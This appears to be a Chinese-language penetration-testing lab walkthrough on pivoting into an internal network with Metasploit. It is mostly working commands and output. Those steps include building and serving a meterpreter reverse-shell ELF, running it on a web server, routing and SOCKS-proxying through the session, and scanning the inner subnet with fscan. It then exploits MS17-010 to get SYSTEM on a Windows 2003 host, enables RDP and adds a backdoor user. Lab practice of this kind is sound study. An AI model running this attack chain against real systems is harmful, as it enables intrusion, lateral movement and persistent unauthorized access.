MSF内网穿透
一、环境配置
1、丑陋的拓扑图
2、web服务器配置
配置两张网卡一张通信外网,一张通信内网
3、Windows2003
虽然这里两张网卡,但是进去的时候会把NAT网卡给禁用掉
那么外网就无法访问了
二、web服务器上线MSF
1、生成远程木马
如果这个木马在后面远程连接时未响应了,请用
frp
,如果不知道frp
后面的端口映射文章
#生成Linux木马
msf6 > msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > shell.elf
[*] exec: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.88.141 LPORT=4444 -f elf > shell.elf
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
#开启http访问
msf6 > python -m http.server 80
[*] exec: python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
2、跳板机下载木马
3、kali开启监听
#开启后台监听
msf6 > handler -p linux/x64/meterpreter/reverse_tcp -H 192.168.88.141 -P 4444
[*] Payload handler running as background job 0.
[*] Started reverse TCP handler on 192.168.88.141:4444
#查看监听项目
msf6 > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
4、跳板机上线MSF
#赋予执行权限
[root@CentOS-2 ~]# chmod +x shell.elf
#查看
[root@CentOS-2 ~]# ll
总用量 988
-rw-r--r-- 1 1000 mysql 98740 6月 20 2017 package.xml
drwxr-xr-x 2 1000 mysql 192 10月 24 20:45 rar
-rw-r--r-- 1 root root 610546 10月 24 20:36 rarlinux-6.0.2.tar.gz
-rwxr-xr-x 1 root root 250 11月 7 20:08 shell.elf
drwxr-xr-x 9 root root 4096 10月 23 20:09 xdebug-2.5.5
-rw-r--r-- 1 root root 279491 10月 23 19:39 xdebug-2.5.5.tgz
#后台执行木马
[root@CentOS-2 ~]# ./shell.elf &
#进程号
[1] 4418
三、内网穿透
1、网卡信息收集
#发现反弹shell
msf6 > [*] 192.168.88.132 - Meterpreter session 2 closed. Reason: Died
[*] Meterpreter session 2 opened (192.168.88.141:4444 -> 192.168.88.132:48462) at 2023-11-07 20:17:27 +0800
[*] Sending stage (3045348 bytes) to 192.168.88.132
[*] Meterpreter session 3 opened (192.168.88.141:4444 -> 192.168.88.132:48464) at 2023-11-07 20:18:11 +0800
#查询连接
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:48464 (192.168.88.132)
#进入连接
msf6 > sessions 3
[*] Starting interaction with 3...
#查看权限
meterpreter > getuid
Server username: root
#查看网卡信息
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:2f:8d:05
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.88.132
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::e9bd:86a7:5c42:bbd7
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : ens35
Hardware MAC : 00:0c:29:2f:8d:0f
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.0.2
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::fcd3:d4de:75a7:5326
IPv6 Netmask : ffff:ffff:ffff:ffff::
发现有个A网段的内网地址
#查看路由
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 192.168.88.2 102 ens33
10.0.0.0 255.255.255.0 0.0.0.0 103 ens35
192.168.88.0 255.255.255.0 0.0.0.0 102 ens33
No IPv6 routes were found.
2、生成路由
在本地网络中,针对这两个子网的流量将会经过 “Session 3” 进行处理
#生成路由
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 192.168.88.132
[*] Searching for subnets to autoroute.
[*] Did not find any new subnets to add.
meterpreter > bg
[*] Backgrounding session 3...
#查看会话路由
msf6 > route print
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
10.0.0.0 255.255.255.0 Session 3
192.168.88.0 255.255.255.0 Session 3
[*] There are currently no IPv6 routes defined.
3、MSF自带的扫描器
msf6 > search discovery
主要MSF自带的扫描器有点玄学,这里就不用了
四、fscan扫描工具
1、下载并安装工具
- 下载地址:
https://github.com/shadow1ng/fscan/releases/tag/1.8.2
Linux64位版本
2、上传工具
#查看当前目录
meterpreter > pwd
/root
#上传工具
meterpreter > upload /home/sword/fscan_amd64
[*] Uploading : /home/sword/fscan_amd64 -> fscan_amd64
[*] Uploaded -1.00 B of 5.93 MiB (0.0%): /home/sword/fscan_amd64 -> fscan_amd64
[*] Completed : /home/sword/fscan_amd64 -> fscan_amd64
#进入bash
meterpreter > shell
pyProcess 5035 created.
Channel 2 created.
#使用python开启一个bash
python -c "import pty;pty.spawn('/bin/bash')"
#修改名字
[root@CentOS-2 ~]# mv fscan_amd64 fscan
mv fscan_arm64 fscan
#赋予执行权限
[root@CentOS-2 ~]# chmod +x fscan
chmod +x fscan
3、工具使用方法
#查看帮助信息
[root@CentOS-2 ~]# ./fscan -h
4、扫描内网主机
#扫描网段
[root@CentOS-2 ~]# ./fscan -h 10.0.0.0/24
./fscan -h 10.0.0.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
#存活的主机使用的ICMP协议
start infoscan
(icmp) Target 10.0.0.2 is alive
(icmp) Target 10.0.0.3 is alive
#扫描的端口
[*] Icmp alive hosts len is: 2
10.0.0.3:445 open
10.0.0.3:139 open
10.0.0.3:135 open
10.0.0.3:80 open
10.0.0.2:22 open
10.0.0.3:8000 open
10.0.0.3:3306 open
10.0.0.3:8101 open
10.0.0.3:8100 open
10.0.0.3:8006 open
10.0.0.3:8004 open
10.0.0.3:8003 open
10.0.0.3:8002 open
10.0.0.3:8001 open
10.0.0.3:8300 open
10.0.0.3:8200 open
[*] alive ports len is: 16
扫描的http服务
爆破的弱口令,但是ssh密码没有爆破出来
五、开启代理进入内网
1、使用MSF代理模块
#退出shell
[root@CentOS-2 ~]# exit
exit
exit
exit
#退出到msf下
meterpreter > bg
[*] Backgrounding session 1...
#进入代理模块
msf6 > use auxiliary/server/socks_proxy
#查看代理必要参数
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local
#代理端口为1080
machine or 0.0.0.0 to listen on all addresses.
SRVPORT 1080 yes The port to listen on
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
When VERSION is 5:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
USERNAME no Proxy username for SOCKS5 listener
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
View the full module info with the info, or info -d command.
#启动代理模块
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
#查看后台运行模块
jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
#监听模块
0 Exploit: multi/handler linux/x64/meterpreter/reverse_tcp tcp://192.168.88.141:4444
#代理模块
1 Auxiliary: server/socks_proxy
2、修改配置文件
这里我的kali是新开了一个bash窗口去修改文件的最下方
┌──(root㉿kali-3)-[/home/sword]
└─# vim /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 1080
3、proxychains
想用kali里面的任何工具都可以使用proxychains代理进去
#连接MySQL
┌──(root?kali-3)-[/home/sword]
└─# proxychains mysql -uroot -h 10.0.0.3 -p
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Enter password:
[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.0.0.3:3306 ... OK
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 514
Server version: 5.5.53 MySQL Community Server (GPL)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
#查看所有数据库名
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| 74cms |
| bbstest |
| challenges |
| cmseasy |
| dorabox |
| dvwa |
| fiyo |
| fiyo78_ |
| fiyocms |
| metinfo |
4、代理思路
- 最开始我们是在MSF里面生成了路由
- 修改了proxychains的配置文件
- 上传了一个shell.elf的木马
proxychains发送数据到本地的MSF
MSF会查询自己的路由表发现是发给10.0的网络
就会把数据发给sessions 1
session1又会把数据传给shell.elf木马
到了shell木马之后给到web服务器
web服务器就去会查自己的路由然后到
win2003
六、利用漏洞
1、搜索漏洞利用模块
我们从fsacn工具扫描出win2003有MS17-010(永恒之蓝漏洞)漏洞
#退出shell
[root@CentOS-2 ~]# exit
exit
exit
exit
#退出到msf下
meterpreter > bg
[*] Backgrounding session 1...
#进入搜索模块
msf6 > search MS17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
#攻击模块
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
#攻击模块
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
#查询模块
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
#查询模块
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
#攻击模块
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
2、换漏洞模块
这里我已经去试过编号0了,它只能利用64位的系统
#进入编号为1的漏洞利用模块
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
#查看参数
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for a
uto)
NAMED_PIPES /usr/share/metasploit-framework yes List of named pipes to check
/data/wordlists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs
/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty list
ing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C
$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.141 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
#写入目标IP
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.0.0.3
RHOST => 10.0.0.3
#跟换为正向连接
msf6 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
#启动模块
msf6 exploit(windows/smb/ms17_010_psexec) > run
3、正向连接成功
#查看权限
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
#保存会话退出
meterpreter > bg
[*] Backgrounding session 3...
#查看sessions
msf6 exploit(windows/smb/ms17_010_psexec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
#web服务器的shell
1 meterpreter x64/linux root @ 192.168.88.132 192.168.88.141:4444 -> 192.168.88.132:35048 (192.168.88.
132)
#windwos2003shell
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ GOD-111 10.0.0.2:53806 -> 10.0.0.3:4444 via session 1 (10.0.0.3)
七、开启远程桌面
1、开启RDP
#进入win2003
msf6 exploit(windows/smb/ms17_010_psexec) > sessions 3
[*] Starting interaction with 3...
#运行开启远程桌面服务
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20231108163204_default_10.0.0.3_host.windows.cle_455566.txt
#进入shell
meterpreter > shell
netProcess 464 created.
Channel 2 created.
Microsoft Windows [°汾 5.2.3790]
(C) °爨̹Ԑ 1985-2003 Microsoft Corp.
#创建用户
C:\WINDOWS\system32>net user sword sword /add
netnet user sword sword /add
'netnet' ²»ˇŚ²¿»¿ļ®£¬Ҳ²»ˇ¿ʔ̐еij͐
»¦mτ¼þ¡£
#加入远程桌面组
C:\WINDOWS\system32>net localgroup "remote desktop users" sword /add
net localgroup "remote desktop users" sword /add
ûԐ´̈«¾דû§» sword.
ȫ¼T HELPMSG 3783 Ӕ»¡£
2、远程连接桌面
#开启远程桌面客户端
┌──(root?kali-3)-[/home/sword]
└─# proxychains remmina
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16